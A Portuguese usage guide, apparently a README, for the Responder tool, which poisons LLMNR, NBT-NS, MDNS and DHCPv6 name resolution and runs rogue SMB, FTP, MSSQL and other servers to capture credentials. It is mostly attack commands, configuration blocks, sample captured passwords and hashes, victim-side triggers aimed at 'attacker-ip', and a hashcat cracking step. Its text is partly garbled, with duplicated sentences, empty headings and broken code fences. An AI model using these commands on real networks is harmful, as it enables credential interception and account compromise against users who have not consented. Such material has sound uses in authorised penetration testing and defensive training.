
Responder é um envenenador de LLMNR, NBT-NS e MDNS, com servidor de autenticação rogue HTTP/SMB/MSSQL/FTP/LDAP integrado, suportando NTLMv1/NTLMv2/LMv2, Segurança Estendida NTLMSSP e autenticação HTTP Básica.
Responder é um envenenador de LLMNR, NBT-NS e MDNS com servidores de autenticação falsos integrados para HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS e mais. Suporta NTLMv1/NTLMv2/LMv2, NTLMSSP com segurança estendida e vários métodos de autenticação em mais de 15 protocolos.
O Responder captura credenciais respondendo a requisições de resolução de nomes LLMNR, NBT-NS e MDNS. Quando um cliente tenta resolver um nome de host inexistente, o Responder responde, direcionando o cliente para a máquina do atacante, onde múltiplos servidores de autenticação falsos capturam as credenciais. Servidores falsos DHCP e DHCPv6 também estão incluídos e podem ser ativados separadamente.
Dados Capturados:
Esta versão inclui:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Instalar Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Início Rápido
### Envenenamento Básico```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### Forçar HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Envenenamento de Rede
### Envenenamento LLMNR/NBT-NS/MDNS
**Propósito:** Responder a falhas de resolução de nomes
**Como funciona:**
1. Cliente transmite consulta para host inexistente
2. Responder responde: "Sou esse host"
3. Cliente conecta-se ao atacante
4. Credenciais capturadas
**Configuração:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Uso:```bash sudo python3 Responder.py -I eth0 -v
### Servidor DHCPv6
**Propósito:** Forçar clientes a usar o DNS do atacante via IPv6
**Recursos:**
- ✅ Suporte a INFORMATION-REQUEST (Windows 10/11)
- ✅ Suporte a SOLICIT/REQUEST
- ✅ Filtragem de domínio (direcionamento cirúrgico)
- ✅ Anúncio de Roteador (opcional)
**Como funciona:**
1. O Windows envia INFORMATION-REQUEST, SOLICIT, REQUEST via DHCPv6
2. O Responder responde: DNS = IPv6 do atacante
3. O Windows prioriza o DNS IPv6
4. Todas as consultas DNS → atacante
5. Envenenamento DNS → captura de credenciais
**Configuração:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Uso:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Resultado Esperado:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
O Responder inclui 17+ servidores de autenticação rogue:
Propósito: Capturar hashes NetNTLM de compartilhamentos de arquivos
Funcionalidades:
Triggers:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Formato Capturado:**```
username::domain:challenge:response:blob
Quebra:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Configuração:**```ini
[Responder Core]
SMB = On
Objetivo: Capturar credenciais FTP em texto claro
Recursos:
Gatilhos:```bash ftp attacker-ip
**Formato Capturado:**```
[FTP] Cleartext: username:password
Configuração:```ini [Responder Core] FTP = On
---
### Servidores de Base de Dados
#### Servidor MSSQL (Porta 1433)
**Finalidade:** Capturar autenticação do Microsoft SQL Server
**Funcionalidades:**
- ✅ Autenticação do SQL Server
- ✅ Autenticação do Windows (NTLM)
- ✅ Credenciais SQL em texto claro
- ✅ Captura de hash NetNTLMv2
**Gatilhos:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Formatos Capturados:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Configuração:**```ini
[Responder Core]
SQL = On
Notas:
Propósito: Capturar autenticação de cliente de email
Recursos: